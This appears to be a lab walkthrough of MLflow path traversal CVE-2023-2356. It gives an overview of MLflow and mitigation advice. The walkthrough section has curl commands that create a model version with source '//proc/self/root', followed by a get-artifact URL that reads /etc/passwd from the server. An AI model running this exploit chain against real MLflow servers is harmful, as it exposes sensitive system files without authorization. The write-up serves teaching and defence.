Mlflow Path Traversal (CVE-2023–2356)
Introduction:
Embarking on the journey of machine learning model development can be both exhilarating and challenging. As data scientists delve into experimentation, model packaging, deployment, and management, they often find themselves grappling with the complexities of the process. This is where MLflow steps in as a beacon of efficiency and organization in the realm of machine learning.
What is MLflow?
MLflow emerges as an open-source platform meticulously crafted to streamline the end-to-end machine learning lifecycle. Whether you’re a seasoned data scientist or a novice enthusiast, MLflow offers an array of indispensable functionalities designed to elevate your ML endeavors.
Primary Functions:
At its core, MLflow revolves around four primary functions, each tailored to address a specific aspect of the machine learning lifecycle:
1. Tracking experiments: MLflow Tracking serves as a robust mechanism for recording and comparing parameters and results across various experiments.
2. Packaging ML code: With MLflow Projects, you can encapsulate your machine learning code in a reusable, reproducible form, facilitating seamless sharing among peers and effortless transfer to production environments.
3. Managing and deploying models: MLflow Models empowers you to manage and deploy models from diverse ML libraries to a myriad of model serving and inference platforms, ensuring flexibility and scalability.
4. Central model store: The MLflow Model Registry serves as a centralized hub for collaboratively managing the full lifecycle of MLflow Models. From versioning to stage transitions and annotations, this repository facilitates efficient model governance and collaboration.
Library-Agnostic:
One of the distinguishing features of MLflow lies in its library-agnostic nature. Regardless of the machine learning library or programming language you prefer, MLflow seamlessly integrates with your workflow. Its functionalities are accessible through a versatile REST API and CLI, accommodating a wide spectrum of preferences and requirements.
API:
To further enhance accessibility and convenience, MLflow provides dedicated APIs for Python, R, and Java, catering to the diverse needs of the data science community.
Security Advisory:
While MLflow empowers users with unparalleled capabilities, it’s essential to remain vigilant about potential vulnerabilities. Recently, a vulnerability (CVE-2023–2356) involving Relative Path Traversal was identified in versions prior to 2.3.1. This vulnerability could potentially expose local server files, posing a security risk.
Solution:
To mitigate this vulnerability, it’s imperative to adhere to the recommended solutions:
- Disable the ability to provide relative paths in sources.
- Ensure that only absolute paths are utilized.
- Promptly update MLflow to the latest version to leverage enhanced security measures and bug fixes.
For a detailed overview of the mitigation steps and changes implemented, refer to the following GitHub commit: Link to GitHub Commit
In essence, MLflow emerges as a transformative force in the landscape of machine learning, empowering data scientists to navigate the complexities of the ML lifecycle with confidence and efficiency. Whether you’re embarking on a new project or seeking to optimize existing workflows, MLflow stands as a steadfast companion, ushering you towards success in the realm of machine learning.
Please open your web browser and navigate to the web application as depicted in the image. Once you’ve done so, you’ll be able to view the web application interface just like the one shown in the image.
Go to the model’s tab, and you can see no model is created yet.
Let’s use a REST API to create one.
Use the following command to register a model.
curl -X POST http://demo.ine.local/api/2.0/mlflow/registered-models/create -H "Content-type: application/json" -d '{"name": "testModel"}'
Run the following command to create a version for the registered model.
curl -X POST http://demo.ine.local/api/2.0/mlflow/model-versions/create -H "Content-type: application/json" -d '{"name":"testModel", "source":"//proc/self/root"}'
Switch to the browser and click on “Refresh” by now you will see the model has been registered.
Please open a new tab in your web browser and enter the following URL:
http://demo.local/model-versions/get-artifact?path=etc/passwd&name=testModel&version=1
This link is designed to retrieve artifacts from the tracking server’s local filesystem. Specifically, it aims to return the contents of the local password file.
It’s important to note that the parameter “path” is utilized by the server to construct a file path for retrieving an artifact. However, it’s susceptible to manipulation by potential attackers who may attempt to navigate outside the intended directory structure. In this case, the parameter “path=etc/passwd” indicates an effort to access the /etc/passwd file, which typically stores user account information on Unix-based systems.
Conclusion:
Through this lab, we’ve illustrated how attackers can exploit vulnerabilities within a web application if proper preventive measures are not implemented. It underscores the critical importance of robust input validation and sanitization for user-controlled inputs, as well as the implementation of stringent access controls to limit file system access. By adhering to these measures, organizations can effectively mitigate the risk of path traversal vulnerabilities and prevent unauthorized access to sensitive files on their systems.
Mitigation:
To address the vulnerabilities highlighted in this lab, it’s imperative to upgrade MLflow to the latest version. By doing so, organizations can leverage enhanced security features and patches that mitigate the risk of exploitation.
References:
- MLflow: Link to MLflow website
- PoC: Link to Proof of Concept on YouTub(PoC)
- CVE-2023–2356: Link to Common Vulnerabilities and Exposures (CVE) entry